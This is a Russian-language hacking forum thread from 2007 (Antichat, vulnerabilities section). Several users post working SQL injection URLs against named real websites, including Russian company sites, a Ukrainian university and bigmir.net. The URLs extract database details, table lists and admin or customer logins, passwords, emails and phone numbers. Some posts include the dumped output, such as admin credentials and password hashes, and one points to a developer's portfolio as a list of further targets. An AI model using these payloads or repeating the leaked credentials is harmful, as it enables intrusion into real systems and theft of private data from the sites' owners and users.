ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3641  
Старый 10.11.2007, 22:17
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Код:
http://k-parts.ru/index.php?actions=yes&id=-8+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4/*
4.0.18-log:elitron9_test:elitron9_elitron@localhost
Код:
http://www.webtel.ru/spec.php?table=phones&id=-745'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user(),0x3a,database(),0x3a,version()),13,14,15,16,17/*
webtel@localhost:webtel:4.1.18

Код:
http://www.mtas.ru/second.php?ID=-29+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x3a),0x3a)/*
mtas116_site@localhost:mtas116_site:4.1.15-nt

Последний раз редактировалось v1ru$; 10.11.2007 в 22:59..
 
Ответить с цитированием

  #3642  
Старый 10.11.2007, 23:15
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

donntu.edu.ua - Донецкий национальный технический университет
4.0.24-logCountercounter@localhost.localdomain
Код:
http://donntu.edu.ua/russian/intas/statistics/statistic.php?id=-1)+union+select+1,concat_ws(0x05,version(),database(),user()),3/*
 
Ответить с цитированием

  #3643  
Старый 11.11.2007, 01:43
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Сайты разработки студии 8000.ru


http://piroclub.ru/product_full.php?id=-3068+union+select+1,2,concat(name,0x3a,login,0x3a, password,0x3a,email),4,5+from+users/*&group_id=122
_________________________________

http://www.piro.ru/news_details.php?id=-89+union+select+1,2,concat_ws(0x3a,id,name,login,p assword,email),4,5,6+from+users+limit+0,1/*
_________________________________

http://www.ibercork.ru/news.php?id=-34+union+select+1,2,concat(login,0x3a,pass,0x3a,ip )+from+my8pref_adm_usr+limit+0,1/*
ibercork:ibercork
_________________________________

http://www.gelionn.ru/subcatalog.php?id=-83+union+select+1,concat(table_name,0x3a,column_na me),3+from+information_schema.columns/*
_________________________________
http://www.sbaspect.ru/pages/?parent=37&id=43&sub=-102+union+select+1,concat(login,0x3a,pass,0x3a,ip) +from+my8pref_adm_usr+limit+0,1/*&name=
admin:5c5fd0f154926edd45f17f9e5064940e
sbadmin:123
seo:f2f9364e99cad8adc315a13c2f00a922
 
Ответить с цитированием

  #3644  
Старый 11.11.2007, 01:46
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

http://services.rol.ru/portal/site/start/menuitem.85bccd817d90ed8faea08a10b751342c/?articleid=-117+union+select+1,2,3,4,5,6,7+from+users/*
 
Ответить с цитированием

  #3645  
Старый 11.11.2007, 01:50
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

продолжение...


http://www.avtovector.ru/service.php?id=-5+union+select+1,table_name+from+information_schem a.tables/*
_________________________________

http://soft.su/?pages_id=4&supplier=-22+union+select+1,2,concat_ws(0x3a,user_login,user _password,user_email),4,5+from+cls_users+limit+1,1/*
админ clite:clite
_________________________________
http://moy-dom.ru/katalog/?action=show_f&id=-3395+union+select+1,2,3,4,table_name,6+from+inform ation_schema.tables/*

_________________________________

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,pass),5,6 ,7,8+from+bestsport_2.my8pref_adm_usr+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,password) ,5,6,7,8+from+users+limit+0,1/*

Последний раз редактировалось fobofob; 11.11.2007 в 13:55..
 
Ответить с цитированием

  #3646  
Старый 11.11.2007, 01:54
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

далее...

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat_ws(0x3a,first_name,l ast_name,email,login,password,patronymic),5,6,7,8+ from+bestsport_2.members+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(username,0x3a,user_p assword,0x3a,user_email,0x3a,user_icq),5,6,7,8+fro m+phpbb_pingpong_users+limit+1,1/*

Админ на форуме kungpo:alex5

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,pwd),4,5+f rom+aut_users+limit+2,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,name,login ,password,phone,city,address),4,5+from+book_users+ limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+conf_users+limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+forum_users+limit+0,1/*

Последний раз редактировалось fobofob; 11.11.2007 в 13:54..
 
Ответить с цитированием

  #3647  
Старый 11.11.2007, 02:03
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

bіgmіr.net

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=25+and+1=1/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,CONCAT_WS(0x3A,VERSION(),USER%20 (),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78/*'


5.0.45-log:mysterygame@localhost:mystery

p.s. бага недавно исправлена

з.з.ы. у меня сегодня 2 года реге на ачате УРЯ!!!

Последний раз редактировалось halkfild; 11.11.2007 в 02:16..
 
Ответить с цитированием

  #3648  
Старый 11.11.2007, 02:07
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Едем дальше...
________________________________

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,login,pass word,pages,info),4,5+from+page_users+limit+0,1/*

________________________________
код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,id,email,passwor d,phone,org,contact,name,occupation,sphere),4,5+fr om+users+limit+0,1/*
________________________________
код:

http://www.superagent.ru/news.php?act=one&nid=-185+union+select+1,2,3,4,concat(table_name,0x3a,co lumn_name)+from+information_schema.columns/* сразу все таблы и колонки.

________________________________
http://www.7000.ru/company/news_details.php?id=-327+union+select+1,2,3,concat_ws(0x3a,email,icq,lo gin,password),5,6+from+7000_stuff_users+limit+0,1/*
________________________________
а это виновник всего

http://www.8000.ru/new.php?otd=dis&idm=14+union+select+1,2,3,4,5,6/*&id=21 вывод в исходнике
Прошу прощения что в несколько постов,иначе не смог-браузер телефона не позволяет
 
Ответить с цитированием

  #3649  
Старый 11.11.2007, 02:20
Dark[<X>]D1ablo
Новичок
Регистрация: 21.10.2007
Сообщений: 5
Провел на форуме:
23460

Репутация: 9
По умолчанию

http://www.happyland.ru/brands.php?id=-2+union+select+1,DATABASE(),3,VERSION(),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29/*
дальше не захотел продолжеть с этим ресурсом, так как компания не малая не хочется проблем...



http://www.fostas.ru/library/show_article.php?id=-103+union+select+1,2,database()/*

http://www.t-dsk.ru/index.php?id=-7+union+select+1,database(),3/*

Последний раз редактировалось Dark[<X>]D1ablo; 11.11.2007 в 03:07..
 
Ответить с цитированием

  #3650  
Старый 11.11.2007, 02:21
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Там еще много сайтов которые можно раскрутить на скуль инъекцию
,портфолио главного героя со списком сайтов:
lazarevich.info/portfolio/two/print
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ